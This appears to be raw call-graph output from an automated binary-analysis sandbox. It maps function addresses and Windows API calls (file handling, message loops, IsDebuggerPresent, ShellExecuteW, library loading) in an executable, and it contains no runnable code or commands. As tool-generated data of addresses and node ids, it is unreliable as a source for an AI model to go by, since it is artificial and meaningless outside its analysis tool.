a262a8 103521->103523 103524 a27ad5 8 API calls 103522->103524 103523->103504 103525 a261d4 103524->103525 103526 a261e1 103525->103526 103527 a65278 LoadStringW 103525->103527 103528 a28577 8 API calls 103526->103528 103530 a65292 103527->103530 103529 a261f6 103528->103529 103531 a26203 103529->103531 103538 a652ae 103529->103538 103533 a2bed9 8 API calls 103530->103533 103536 a26229 ___scrt_fastfail 103530->103536 103531->103530 103532 a2620d 103531->103532 103534 a26b7c 8 API calls 103532->103534 103533->103536 103535 a2621b 103534->103535 103537 a27bb5 8 API calls 103535->103537 103540 a2628e Shell_NotifyIconW 103536->103540 103537->103536 103538->103536 103539 a652f1 103538->103539 103541 a2bf73 8 API calls 103538->103541 103553 a3fe6f 51 API calls 103539->103553 103540->103523 103542 a652d8 103541->103542 103552 a8a350 9 API calls 103542->103552 103545 a652e3 103547 a27bb5 8 API calls 103545->103547 103546 a65310 103548 a26b7c 8 API calls 103546->103548 103547->103539 103549 a65321 103548->103549 103550 a26b7c 8 API calls 103549->103550 103550->103536 103551->103502 103552->103545 103553->103546 103554->103020 103555->103004 103556->103020 103557->103021 103558->103020 103559->102843 103560->102843 103561->102839 103562->102844 103563->102746 103564->102739 103565->102741 103566->102741 103584 a2cf80 103567->103584 103569 a2bfb5 103570 a70db6 103569->103570 103571 a2bfc3 103569->103571 103593 a2b4c8 8 API calls 103570->103593 103573 a4014b 8 API calls 103571->103573 103575 a2bfd4 103573->103575 103574 a70dc1 103576 a2bf73 8 API calls 103575->103576 103577 a2bfde 103576->103577 103578 a2bfed 103577->103578 103579 a2bed9 8 API calls 103577->103579 103580 a4014b 8 API calls 103578->103580 103579->103578 103581 a2bff7 103580->103581 103592 a2be7b 39 API calls 103581->103592 103583 a2c01b 103583->102650 103585 a2d1c7 103584->103585 103589 a2cf93 103584->103589 103585->103569 103587 a2bf73 8 API calls 103587->103589 103588 a2d03d 103588->103569 103589->103587 103589->103588 103594 a405b2 5 API calls __Init_thread_wait 103589->103594 103595 a40413 29 API calls __onexit 103589->103595 103596 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103589->103596 103592->103583 103593->103574 103594->103589 103595->103589 103596->103589 105139 a58782 105144 a5853e 105139->105144 105142 a587aa 105149 a5856f try_get_first_available_module 105144->105149 105146 a5876e 105163 a52b5c 26 API calls pre_c_initialization 105146->105163 105148 a586c3 105148->105142 105156 a60d04 105148->105156 105152 a586b8 105149->105152 105159 a4917b 40 API calls 2 library calls 105149->105159 105151 a5870c 105151->105152 105160 a4917b 40 API calls 2 library calls 105151->105160 105152->105148 105162 a4f649 20 API calls __dosmaperr 105152->105162 105154 a5872b 105154->105152 105161 a4917b 40 API calls 2 library calls 105154->105161 105164 a60401 105156->105164 105158 a60d1f 105158->105142 105159->105151 105160->105154 105161->105152 105162->105146 105163->105148 105167 a6040d ___DestructExceptionObject 105164->105167 105165 a6041b 105222 a4f649 20 API calls __dosmaperr 105165->105222 105167->105165 105169 a60454 105167->105169 105168 a60420 105223 a52b5c 26 API calls pre_c_initialization 105168->105223 105175 a609db 105169->105175 105174 a6042a __fread_nolock 105174->105158 105225 a607af 105175->105225 105178 a60a26 105243 a55594 105178->105243 105179 a60a0d 105257 a4f636 20 API calls __dosmaperr 105179->105257 105182 a60a12 105258 a4f649 20 API calls __dosmaperr 105182->105258 105183 a60a2b 105184 a60a34 105183->105184 105185 a60a4b 105183->105185 105259 a4f636 20 API calls __dosmaperr 105184->105259 105256 a6071a CreateFileW 105185->105256 105189 a60a39 105260 a4f649 20 API calls __dosmaperr 105189->105260 105190 a60b01 GetFileType 105193 a60b53 105190->105193 105194 a60b0c GetLastError 105190->105194 105192 a60ad6 GetLastError 105262 a4f613 20 API calls __dosmaperr 105192->105262 105265 a554dd 21 API calls 2 library calls 105193->105265 105263 a4f613 20 API calls __dosmaperr 105194->105263 105195 a60a84 105195->105190 105195->105192 105261 a6071a CreateFileW 105195->105261 105199 a60b1a CloseHandle 105199->105182 105202 a60b43 105199->105202 105201 a60ac9 105201->105190 105201->105192 105264 a4f649 20 API calls __dosmaperr 105202->105264 105203 a60b74 105205 a60bc0 105203->105205 105266 a6092b 72 API calls 3 library calls 105203->105266 105210 a60bed 105205->105210 105267 a604cd 72 API calls 4 library calls 105205->105267 105206 a60b48 105206->105182 105209 a60be6 105209->105210 105211 a60bfe 105209->105211 105268 a58a2e 105210->105268 105213 a60478 105211->105213 105214 a60c7c CloseHandle 105211->105214 105224 a604a1 LeaveCriticalSection __wsopen_s 105213->105224 105283 a6071a CreateFileW 105214->105283 105216 a60ca7 105217 a60cdd 105216->105217 105218 a60cb1 GetLastError 105216->105218 105217->105213 105284 a4f613 20 API calls __dosmaperr 105218->105284 105220 a60cbd 105285 a556a6 21 API calls 2 library calls 105220->105285 105222->105168 105223->105174 105224->105174 105226 a607d0 105225->105226 105231 a607ea 105225->105231 105226->105231 105293 a4f649 20 API calls __dosmaperr 105226->105293 105229 a607df 105294 a52b5c 26 API calls pre_c_initialization 105229->105294 105286 a6073f 105231->105286 105232 a60851 105241 a608a4 105232->105241 105297 a4da7d 26 API calls 2 library calls 105232->105297 105233 a60822 105233->105232 105295 a4f649 20 API calls __dosmaperr 105233->105295 105236 a6089f 105238 a6091e 105236->105238 105236->105241 105237 a60846 105296 a52b5c 26 API calls pre_c_initialization 105237->105296 105298 a52b6c 11 API calls _abort 105238->105298 105241->105178 105241->105179 105242 a6092a 105244 a555a0 ___DestructExceptionObject 105243->105244 105301 a532d1 EnterCriticalSection 105244->105301 105246 a555a7 105247 a555cc 105246->105247 105252 a5563a EnterCriticalSection 105246->105252 105254 a555ee 105246->105254 105250 a55373 __wsopen_s 21 API calls 105247->105250 105249 a55617 __fread_nolock 105249->105183 105251 a555d1 105250->105251 105251->105254 105305 a554ba EnterCriticalSection 105251->105305 105253 a55647 LeaveCriticalSection 105252->105253 105252->105254 105253->105246 105302 a5569d 105254->105302 105256->105195 105257->105182 105258->105213 105259->105189 105260->105182 105261->105201 105262->105182 105263->105199 105264->105206 105265->105203 105266->105205 105267->105209 105269 a55737 __wsopen_s 26 API calls 105268->105269 105272 a58a3e 105269->105272 105270 a58a44 105307 a556a6 21 API calls 2 library calls 105270->105307 105272->105270 105275 a55737 __wsopen_s 26 API calls 105272->105275 105282 a58a76 105272->105282 105273 a55737 __wsopen_s 26 API calls 105276 a58a82 CloseHandle 105273->105276 105274 a58a9c 105281 a58abe 105274->105281 105308 a4f613 20 API calls __dosmaperr 105274->105308 105277 a58a6d 105275->105277 105276->105270 105279 a58a8e GetLastError 105276->105279 105278 a55737 __wsopen_s 26 API calls 105277->105278 105278->105282 105279->105270 105281->105213 105282->105270 105282->105273 105283->105216 105284->105220 105285->105217 105289 a60757 105286->105289 105287 a60772 105287->105233 105289->105287 105299 a4f649 20 API calls __dosmaperr 105289->105299 105290 a60796 105300 a52b5c 26 API calls pre_c_initialization 105290->105300 105292 a607a1 105292->105233 105293->105229 105294->105231 105295->105237 105296->105232 105297->105236 105298->105242 105299->105290 105300->105292 105301->105246 105306 a53319 LeaveCriticalSection 105302->105306 105304 a556a4 105304->105249 105305->105254 105306->105304 105307->105274 105308->105281 103597 a765af 103598 a4014b 8 API calls 103597->103598 103599 a765b6 103598->103599 103603 a8fafb 103599->103603 103601 a765c2 103602 a8fafb 8 API calls 103601->103602 103602->103601 103604 a8fb1b 103603->103604 103605 a8fbe4 103604->103605 103606 a4017b 8 API calls 103604->103606 103605->103601 103609 a8fb57 103606->103609 103608 a8fb79 103608->103605 103610 a2bed9 8 API calls 103608->103610 103609->103608 103611 a8fbed 8 API calls 103609->103611 103610->103608 103611->103609 105309 a7400f 105324 a2eeb0 ISource 105309->105324 105310 a2f0d5 105311 a2f211 PeekMessageW 105311->105324 105312 a2ef07 GetInputState 105312->105311 105312->105324 105313 a732cd TranslateAcceleratorW 105313->105324 105315 a2f273 TranslateMessage DispatchMessageW 105316 a2f28f PeekMessageW 105315->105316 105316->105324 105317 a2f104 timeGetTime 105317->105324 105318 a2f2af Sleep 105335 a2f2c0 105318->105335 105319 a74183 Sleep 105319->105335 105320 a3f215 timeGetTime 105320->105335 105321 a733e9 timeGetTime 105376 a3aa65 9 API calls 105321->105376 105323 a8dd87 46 API calls 105323->105335 105324->105310 105324->105311 105324->105312 105324->105313 105324->105315 105324->105316 105324->105317 105324->105318 105324->105319 105324->105321 105338 a30340 207 API calls 105324->105338 105339 a32b20 207 API calls 105324->105339 105341 a2f450 105324->105341 105348 a2f6d0 105324->105348 105371 a3e915 105324->105371 105377 a9446f 8 API calls 105324->105377 105378 a93fe1 81 API calls __wsopen_s 105324->105378 105325 a7421a GetExitCodeProcess 105329 a74246 CloseHandle 105325->105329 105330 a74230 WaitForSingleObject 105325->105330 105327 a73d51 105331 a73d59 105327->105331 105328 ab345b GetForegroundWindow 105328->105335 105329->105335 105330->105324 105330->105329 105332 a742b8 Sleep 105332->105324 105335->105320 105335->105323 105335->105324 105335->105325 105335->105327 105335->105328 105335->105332 105379 aa60b5 8 API calls 105335->105379 105380 a8f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105335->105380 105338->105324 105339->105324 105342 a2f483 105341->105342 105343 a2f46f 105341->105343 105413 a93fe1 81 API calls __wsopen_s 105342->105413 105381 a2e960 105343->105381 105345 a2f47a 105345->105324 105347 a74584 105347->105347 105349 a2f710 105348->105349 105355 a2f7dc ISource 105349->105355 105430 a405b2 5 API calls __Init_thread_wait 105349->105430 105352 a745d9 105354 a2bf73 8 API calls 105352->105354 105352->105355 105353 a2bf73 8 API calls 105353->105355 105356 a745f3 105354->105356 105355->105353 105357 a2be2d 39 API calls 105355->105357 105364 a30340 207 API calls 105355->105364 105365 a2bed9 8 API calls 105355->105365 105366 a2fae1 105355->105366 105367 a31ca0 8 API calls 105355->105367 105368 a93fe1 81 API calls 105355->105368 105429 a3b35c 207 API calls 105355->105429 105433 a405b2 5 API calls __Init_thread_wait 105355->105433 105434 a40413 29 API calls __onexit 105355->105434 105435 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105355->105435 105436 aa5231 101 API calls 105355->105436 105437 aa731e 207 API calls 105355->105437 105431 a40413 29 API calls __onexit 105356->105431 105357->105355 105360 a745fd 105432 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105360->105432 105364->105355 105365->105355 105366->105324 105367->105355 105368->105355 105372 a3e959 105371->105372 105373 a3e928 105371->105373 105372->105324 105373->105372 105374 a3e94c IsDialogMessageW 105373->105374 105375 a7eff6 GetClassLongW 105373->105375 105374->105372 105374->105373 105375->105373 105375->105374 105376->105324 105377->105324 105378->105324 105379->105335 105380->105335 105382 a30340 207 API calls 105381->105382 105399 a2e99d 105382->105399 105384 a2ea0b ISource 105384->105345 105385 a2eac3 105386 a2eace 105385->105386 105391 a2edd5 105385->105391 105388 a4014b 8 API calls 105386->105388 105387 a2ecff 105389 a731c4 105387->105389 105390 a2ed14 105387->105390 105402 a2ead5 __fread_nolock 105388->105402 105426 aa6162 8 API calls 105389->105426 105394 a4014b 8 API calls 105390->105394 105391->105384 105396 a4017b 8 API calls 105391->105396 105392 a2ebb8 105397 a4017b 8 API calls 105392->105397 105405 a2eb6a 105394->105405 105395 a4014b 8 API calls 105395->105399 105396->105402 105408 a2eb29 ISource __fread_nolock 105397->105408 105398 a731d3 105427 a93fe1 81 API calls __wsopen_s 105398->105427 105399->105384 105399->105385 105399->105391 105399->105392 105399->105395 105399->105398 105399->105408 105400 a4014b 8 API calls 105401 a2eaf6 105400->105401 105401->105408 105414 a2d260 105401->105414 105402->105400 105402->105401 105404 a731b3 105425 a93fe1 81 API calls __wsopen_s 105404->105425 105405->105345 105408->105387 105408->105404 105408->105405 105409 a7318e 105408->105409 105411 a7316c 105408->105411 105422 a244fe 207 API calls 105408->105422 105424 a93fe1 81 API calls __wsopen_s 105409->105424 105423 a93fe1 81 API calls __wsopen_s 105411->105423 105413->105347 105415 a2d2c6 105414->105415 105416 a2d29a 105414->105416 105418 a30340 207 API calls 105415->105418 105417 a2f6d0 207 API calls 105416->105417 105420 a2d2a0 105416->105420 105417->105420 105419 a7184b 105418->105419 105419->105420 105428 a93fe1 81 API calls __wsopen_s 105419->105428 105420->105408 105422->105408 105423->105405 105424->105405 105425->105405 105426->105398 105427->105384 105428->105420 105429->105355 105430->105352 105431->105360 105432->105355 105433->105355 105434->105355 105435->105355 105436->105355 105437->105355 105438 a2da4a 105439 a2dbc4 105438->105439 105440 a2da54 105438->105440 105450 a4017b 8 API calls 105439->105450 105452 a2d5e1 105439->105452 105455 a2dc19 105439->105455 105440->105439 105441 a2cf80 39 API calls 105440->105441 105442 a2dace 105441->105442 105443 a4014b 8 API calls 105442->105443 105444 a2dae7 105443->105444 105445 a4017b 8 API calls 105444->105445 105446 a2db05 105445->105446 105447 a4014b 8 API calls 105446->105447 105449 a2db16 __fread_nolock 105447->105449 105448 a4014b 8 API calls 105451 a2db7f 105448->105451 105449->105439 105449->105448 105450->105439 105451->105439 105453 a2cf80 39 API calls 105451->105453 105454 a4014b 8 API calls 105452->105454 105453->105439 105461 a2d66e ISource 105454->105461 105456 a2c3ab 8 API calls 105466 a2d9ac ISource 105456->105466 105457 a2bed9 8 API calls 105457->105461 105460 a71f79 105470 a856ae 8 API calls ISource 105460->105470 105461->105457 105461->105460 105462 a71f94 105461->105462 105464 a2c3ab 8 API calls 105461->105464 105465 a2d911 ISource 105461->105465 105469 a2b4c8 8 API calls 105461->105469 105464->105461 105465->105456 105465->105466 105467 a2d9c3 105466->105467 105468 a3e30a 8 API calls ISource 105466->105468 105468->105466 105469->105461 105470->105462 103612 a4f06e 103613 a4f07a ___DestructExceptionObject 103612->103613 103614 a4f086 103613->103614 103615 a4f09b 103613->103615 103631 a4f649 20 API calls __dosmaperr 103614->103631 103625 a494fd EnterCriticalSection 103615->103625 103618 a4f0a7 103626 a4f0db 103618->103626 103619 a4f08b 103632 a52b5c 26 API calls pre_c_initialization 103619->103632 103624 a4f096 __fread_nolock 103625->103618 103634 a4f106 103626->103634 103628 a4f0e8 103629 a4f0b4 103628->103629 103654 a4f649 20 API calls __dosmaperr 103628->103654 103633 a4f0d1 LeaveCriticalSection __fread_nolock 103629->103633 103631->103619 103632->103624 103633->103624 103635 a4f114 103634->103635 103636 a4f12e 103634->103636 103665 a4f649 20 API calls __dosmaperr 103635->103665 103655 a4dcc5 103636->103655 103639 a4f137 103662 a59789 103639->103662 103640 a4f119 103666 a52b5c 26 API calls pre_c_initialization 103640->103666 103644 a4f1bf 103648 a4f1dc 103644->103648 103649 a4f1ee 103644->103649 103645 a4f23b 103646 a4f248 103645->103646 103645->103649 103668 a4f649 20 API calls __dosmaperr 103646->103668 103667 a4f41f 31 API calls 4 library calls 103648->103667 103651 a4f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103649->103651 103669 a4f29b 30 API calls 2 library calls 103649->103669 103651->103628 103652 a4f1e6 103652->103651 103654->103629 103656 a4dce6 103655->103656 103657 a4dcd1 103655->103657 103656->103639 103670 a4f649 20 API calls __dosmaperr 103657->103670 103659 a4dcd6 103671 a52b5c 26 API calls pre_c_initialization 103659->103671 103661 a4dce1 103661->103639 103672 a59606 103662->103672 103664 a4f153 103664->103644 103664->103645 103664->103651 103665->103640 103666->103651 103667->103652 103668->103651 103669->103651 103670->103659 103671->103661 103673 a59612 ___DestructExceptionObject 103672->103673 103674 a59632 103673->103674 103675 a5961a 103673->103675 103677 a596e6 103674->103677 103682 a5966a 103674->103682 103707 a4f636 20 API calls __dosmaperr 103675->103707 103712 a4f636 20 API calls __dosmaperr 103677->103712 103678 a5961f 103708 a4f649 20 API calls __dosmaperr 103678->103708 103681 a596eb 103713 a4f649 20 API calls __dosmaperr 103681->103713 103697 a554ba EnterCriticalSection 103682->103697 103685 a596f3 103714 a52b5c 26 API calls pre_c_initialization 103685->103714 103686 a59670 103688 a59694 103686->103688 103689 a596a9 103686->103689 103709 a4f649 20 API calls __dosmaperr 103688->103709 103698 a5970b 103689->103698 103691 a59627 __fread_nolock 103691->103664 103693 a59699 103710 a4f636 20 API calls __dosmaperr 103693->103710 103694 a596a4 103711 a596de LeaveCriticalSection __wsopen_s 103694->103711 103697->103686 103715 a55737 103698->103715 103700 a5971d 103701 a59725 103700->103701 103702 a59736 SetFilePointerEx 103700->103702 103728 a4f649 20 API calls __dosmaperr 103701->103728 103704 a5974e GetLastError 103702->103704 103706 a5972a 103702->103706 103729 a4f613 20 API calls __dosmaperr 103704->103729 103706->103694 103707->103678 103708->103691 103709->103693 103710->103694 103711->103691 103712->103681 103713->103685 103714->103691 103716 a55744 103715->103716 103717 a55759 103715->103717 103730 a4f636 20 API calls __dosmaperr 103716->103730 103721 a5577e 103717->103721 103732 a4f636 20 API calls __dosmaperr 103717->103732 103720 a55749 103731 a4f649 20 API calls __dosmaperr 103720->103731 103721->103700 103722 a55789 103733 a4f649 20 API calls __dosmaperr 103722->103733 103725 a55751 103725->103700 103726 a55791 103734 a52b5c 26 API calls pre_c_initialization 103726->103734 103728->103706 103729->103706 103730->103720 103731->103725 103732->103722 103733->103726 103734->103725 103735 a4076b 103736 a40777 ___DestructExceptionObject 103735->103736 103765 a40221 103736->103765 103738 a4077e 103739 a408d1 103738->103739 103742 a407a8 103738->103742 103803 a40baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103739->103803 103741 a408d8 103804 a451c2 28 API calls _abort 103741->103804 103753 a407e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103742->103753 103776 a527ed 103742->103776 103744 a408de 103805 a45174 28 API calls _abort 103744->103805 103748 a408e6 103749 a407c7 103751 a40848 103784 a40cc9 103751->103784 103753->103751 103799 a4518a 38 API calls 3 library calls 103753->103799 103754 a4084e 103788 a2331b 103754->103788 103759 a4086a 103759->103741 103760 a4086e 103759->103760 103761 a40877 103760->103761 103801 a45165 28 API calls _abort 103760->103801 103802 a403b0 13 API calls 2 library calls 103761->103802 103764 a4087f 103764->103749 103766 a4022a 103765->103766 103806 a40a08 IsProcessorFeaturePresent 103766->103806 103768 a40236 103807 a43004 10 API calls 3 library calls 103768->103807 103770 a4023b 103771 a4023f 103770->103771 103808 a52687 103770->103808 103771->103738 103774 a40256 103774->103738 103778 a52804 103776->103778 103777 a40dfc _ValidateLocalCookies 5 API calls 103779 a407c1 103777->103779 103778->103777 103779->103749 103780 a52791 103779->103780 103783 a527c0 103780->103783 103781 a40dfc _ValidateLocalCookies 5 API calls 103782 a527e9 103781->103782 103782->103753 103783->103781 103883 a426b0 103784->103883 103787 a40cef 103787->103754 103789 a23382 103788->103789 103790 a23327 IsThemeActive 103788->103790 103800 a40d02 GetModuleHandleW 103789->103800 103885 a452b3 103790->103885 103792 a23352 103891 a45319 103792->103891 103794 a23359 103898 a232e6 SystemParametersInfoW SystemParametersInfoW 103794->103898 103796 a23360 103899 a2338b 103796->103899 103798 a23368 SystemParametersInfoW 103798->103789 103799->103751 103800->103759 103801->103761 103802->103764 103803->103741 103804->103744 103805->103748 103806->103768 103807->103770 103812 a5d576 103808->103812 103811 a4302d 8 API calls 3 library calls 103811->103771 103815 a5d593 103812->103815 103816 a5d58f 103812->103816 103814 a40248 103814->103774 103814->103811 103815->103816 103818 a54f6e 103815->103818 103830 a40dfc 103816->103830 103819 a54f7a ___DestructExceptionObject 103818->103819 103837 a532d1 EnterCriticalSection 103819->103837 103821 a54f81 103838 a55422 103821->103838 103823 a54f90 103824 a54f9f 103823->103824 103851 a54e02 29 API calls 103823->103851 103853 a54fbb LeaveCriticalSection _abort 103824->103853 103827 a54f9a 103852 a54eb8 GetStdHandle GetFileType 103827->103852 103828 a54fb0 __fread_nolock 103828->103815 103831 a40e05 103830->103831 103832 a40e07 IsProcessorFeaturePresent 103830->103832 103831->103814 103834 a40fce 103832->103834 103882 a40f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103834->103882 103836 a410b1 103836->103814 103837->103821 103839 a5542e ___DestructExceptionObject 103838->103839 103840 a55452 103839->103840 103841 a5543b 103839->103841 103854 a532d1 EnterCriticalSection 103840->103854 103862 a4f649 20 API calls __dosmaperr 103841->103862 103844 a55440 103863 a52b5c 26 API calls pre_c_initialization 103844->103863 103846 a5544a __fread_nolock 103846->103823 103847 a5548a 103864 a554b1 LeaveCriticalSection _abort 103847->103864 103849 a5545e 103849->103847 103855 a55373 103849->103855 103851->103827 103852->103824 103853->103828 103854->103849 103865 a54ff0 103855->103865 103857 a55385 103861 a55392 103857->103861 103872 a53778 11 API calls 2 library calls 103857->103872 103860 a553e4 103860->103849 103873 a52d38 103861->103873 103862->103844 103863->103846 103864->103846 103870 a54ffd pair 103865->103870 103866 a5503d 103880 a4f649 20 API calls __dosmaperr 103866->103880 103867 a55028 RtlAllocateHeap 103868 a5503b 103867->103868 103867->103870 103868->103857 103870->103866 103870->103867 103879 a4521d 7 API calls 2 library calls 103870->103879 103872->103857 103874 a52d6c __dosmaperr 103873->103874 103875 a52d43 RtlFreeHeap 103873->103875 103874->103860 103875->103874 103876 a52d58 103875->103876 103881 a4f649 20 API calls __dosmaperr 103876->103881 103878 a52d5e GetLastError 103878->103874 103879->103870 103880->103868 103881->103878 103882->103836 103884 a40cdc GetStartupInfoW 103883->103884 103884->103787 103886 a452bf ___DestructExceptionObject 103885->103886 103948 a532d1 EnterCriticalSection 103886->103948 103888 a452ca pre_c_initialization 103949 a4530a 103888->103949 103890 a452ff __fread_nolock 103890->103792 103892 a4533f 103891->103892 103893 a45325 103891->103893 103892->103794 103893->103892 103953 a4f649 20 API calls __dosmaperr 103893->103953 103895 a4532f 103954 a52b5c 26 API calls pre_c_initialization 103895->103954 103897 a4533a 103897->103794 103898->103796 103900 a2339b __wsopen_s 103899->103900 103901 a2bf73 8 API calls 103900->103901 103902 a233a7 GetCurrentDirectoryW 103901->103902 103955 a24fd9 103902->103955 103904 a233ce IsDebuggerPresent 103905 a63ca3 MessageBoxA 103904->103905 103906 a233dc 103904->103906 103908 a63cbb 103905->103908 103907 a233f0 103906->103907 103906->103908 104023 a23a95 103907->104023 104059 a24176 8 API calls 103908->104059 103915 a23462 103917 a63cec SetCurrentDirectoryW 103915->103917 103918 a2346a 103915->103918 103917->103918 103919 a23475 103918->103919 104060 a81fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103918->104060 104055 a234d3 7 API calls 103919->104055 103923 a63d07 103923->103919 103925 a63d19 103923->103925 104061 a25594 103925->104061 103926 a2347f 103929 a2396b 60 API calls 103926->103929 103932 a23494 103926->103932 103928 a63d22 103930 a2b329 8 API calls 103928->103930 103929->103932 103931 a63d30 103930->103931 103934 a63d5f 103931->103934 103935 a63d38 103931->103935 103933 a234af 103932->103933 103936 a23907 Shell_NotifyIconW 103932->103936 103939 a234b6 SetCurrentDirectoryW 103933->103939 103938 a26b7c 8 API calls 103934->103938 103937 a26b7c 8 API calls 103935->103937 103936->103933 103940 a63d43 103937->103940 103941 a63d5b GetForegroundWindow ShellExecuteW 103938->103941 103942 a234ca 103939->103942 103943 a27bb5 8 API calls 103940->103943 103945 a63d90 103941->103945 103942->103798 103946 a63d51 103943->103946 103945->103933 103947 a26b7c 8 API calls 103946->103947 103947->103941 103948->103888 103952 a53319 LeaveCriticalSection 103949->103952 103951 a45311 103951->103890 103952->103951 103953->103895 103954->103897 103956 a2bf73 8 API calls 103955->103956 103957 a24fef 103956->103957 104068 a263d7 103957->104068 103959 a2500d 103960 a2bd57 8 API calls 103959->103960 103961 a25021 103960->103961 103962 a2bed9 8 API calls 103961->103962 103963 a2502c 103962->103963 104082 a2893c 103963->104082 103966 a2b329 8 API calls 103967 a25045 103966->103967 103968 a2be2d 39 API calls 103967->103968 103969 a25055 103968->103969 103970 a2b329 8 API calls 103969->103970 103971 a2507b 103970->103971 103972 a2be2d 39 API calls 103971->103972 103973 a2508a 103972->103973 103974 a2bf73 8 API calls 103973->103974 103975 a250a8 103974->103975 104085 a251ca 103975->104085 103978 a44d98 _strftime 40 API calls 103979 a250c2 103978->103979 103980 a64b23 103979->103980 103981 a250cc 103979->103981 103983 a251ca 8 API calls 103980->103983 103982 a44d98 _strftime 40 API calls 103981->103982 103984 a250d7 103982->103984 103985 a64b37 103983->103985 103984->103985 103986 a250e1 103984->103986 103987 a251ca 8 API calls 103985->103987 103988 a44d98 _strftime 40 API calls 103986->103988 103989 a64b53 103987->103989 103990 a250ec 103988->103990 103992 a25594 10 API calls 103989->103992 103990->103989 103991 a250f6 103990->103991 103993 a44d98 _strftime 40 API calls 103991->103993 103994 a64b76 103992->103994 103995 a25101 103993->103995 103996 a251ca 8 API calls 103994->103996 103997 a64b9f 103995->103997 103998 a2510b 103995->103998 103999 a64b82 103996->103999 104001 a251ca 8 API calls 103997->104001 104000 a2512e 103998->104000 104004 a2bed9 8 API calls 103998->104004 104003 a2bed9 8 API calls 103999->104003 104002 a64bda 104000->104002 104007 a27e12 8 API calls 104000->104007 104005 a64bbd 104001->104005 104008 a64b90 104003->104008 104009 a25121 104004->104009 104006 a2bed9 8 API calls 104005->104006 104011 a64bcb 104006->104011 104012 a2513e 104007->104012 104013 a251ca 8 API calls 104008->104013 104010 a251ca 8 API calls 104009->104010 104010->104000 104014 a251ca 8 API calls 104011->104014 104015 a28470 8 API calls 104012->104015 104013->103997 104014->104002 104016 a2514c 104015->104016 104091 a28a60 104016->104091 104018 a2893c 8 API calls 104020 a25167 104018->104020 104019 a28a60 8 API calls 104019->104020 104020->104018 104020->104019 104021 a251ab 104020->104021 104022 a251ca 8 API calls 104020->104022 104021->103904 104022->104020 104024 a23aa2 __wsopen_s 104023->104024 104025 a23abb 104024->104025 104026 a640da ___scrt_fastfail 104024->104026 104027 a25851 9 API calls 104025->104027 104029 a640f6 GetOpenFileNameW 104026->104029 104028 a23ac4 104027->104028 104110 a23a57 104028->104110 104031 a64145 104029->104031 104033 a28577 8 API calls 104031->104033 104034 a6415a 104033->104034 104034->104034 104036 a23ad9 104128 a262d5 104036->104128 104734 a23624 7 API calls 104055->104734 104057 a2347a 104058 a235b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104057->104058 104058->103926 104059->103915 104060->103923 104062 a622d0 __wsopen_s 104061->104062 104063 a255a1 GetModuleFileNameW 104062->104063 104064 a2b329 8 API calls 104063->104064 104065 a255c7 104064->104065 104066 a25851 9 API calls 104065->104066 104067 a255d1 104066->104067 104067->103928 104069 a263e4 __wsopen_s 104068->104069 104070 a28577 8 API calls 104069->104070 104071 a26416 104069->104071 104070->104071 104072 a2655e 8 API calls 104071->104072 104078 a2644c 104071->104078 104072->104071 104073 a2b329 8 API calls 104074 a26543 104073->104074 104077 a26a7c 8 API calls 104074->104077 104075 a2b329 8 API calls 104075->104078 104076 a2655e 8 API calls 104076->104078 104079 a2654f 104077->104079 104078->104075 104078->104076 104081 a2651a 104078->104081 104102 a26a7c 104078->104102 104079->103959 104081->104073 104081->104079 104083 a4014b 8 API calls 104082->104083 104084 a25038 104083->104084 104084->103966 104086 a251f2 104085->104086 104087 a251d4 104085->104087 104089 a28577 8 API calls 104086->104089 104088 a250b4 104087->104088 104090 a2bed9 8 API calls 104087->104090 104088->103978 104089->104088 104090->104088 104092 a28a76 104091->104092 104093 a66737 104092->104093 104099 a28a80 104092->104099 104108 a3b7a2 8 API calls 104093->104108 104094 a66744 104109 a2b4c8 8 API calls 104094->104109 104097 a66762 104097->104097 104098 a28b94 104100 a4014b 8 API calls 104098->104100 104099->104094 104099->104098 104101 a28b9b 104099->104101 104100->104101 104101->104020 104103 a26a8b 104102->104103 104107 a26aac __fread_nolock 104102->104107 104106 a4017b 8 API calls 104103->104106 104104 a4014b 8 API calls 104105 a26abf 104104->104105 104105->104078 104106->104107 104107->104104 104108->104094 104109->104097 104111 a622d0 __wsopen_s 104110->104111 104112 a23a64 GetLongPathNameW 104111->104112 104113 a28577 8 API calls 104112->104113 104114 a23a8c 104113->104114 104115 a253f2 104114->104115 104116 a2bf73 8 API calls 104115->104116 104117 a25404 104116->104117 104118 a25851 9 API calls 104117->104118 104119 a2540f 104118->104119 104120 a2541a 104119->104120 104121 a64d5b 104119->104121 104122 a26a7c 8 API calls 104120->104122 104126 a64d7d 104121->104126 104164 a3e36b 41 API calls 104121->104164 104124 a25426 104122->104124 104158 a21340 104124->104158 104127 a25439 104127->104036 104165 a26679 104128->104165 104131 a65336 104290 a936b8 104131->104290 104133 a26679 93 API calls 104135 a2630e 104133->104135 104135->104131 104138 a26316 104135->104138 104159 a21352 104158->104159 104163 a21371 __fread_nolock 104158->104163 104161 a4017b 8 API calls 104159->104161 104160 a4014b 8 API calls 104162 a21388 104160->104162 104161->104163 104162->104127 104163->104160 104164->104121 104339 a2663e LoadLibraryA 104165->104339 104170 a266a4 LoadLibraryExW 104347 a26607 LoadLibraryA 104170->104347 104171 a65648 104173 a266e7 68 API calls 104171->104173 104175 a6564f 104173->104175 104177 a26607 3 API calls 104175->104177 104179 a65657 104177->104179 104178 a266ce 104178->104179 104180 a266da 104178->104180 104368 a2684a 104179->104368 104182 a266e7 68 API calls 104180->104182 104184 a262fa 104182->104184 104184->104131 104184->104133 104291 a936d4 104290->104291 104292 a26874 64 API calls 104291->104292 104340 a26656 GetProcAddress 104339->104340 104341 a26674 104339->104341 104342 a26666 104340->104342 104344 a4e95b 104341->104344 104342->104341 104343 a2666d FreeLibrary 104342->104343 104343->104341 104376 a4e89a 104344->104376 104346 a26698 104346->104170 104346->104171 104348 a2663b 104347->104348 104349 a2661c GetProcAddress 104347->104349 104352 a26720 104348->104352 104350 a2662c 104349->104350 104350->104348 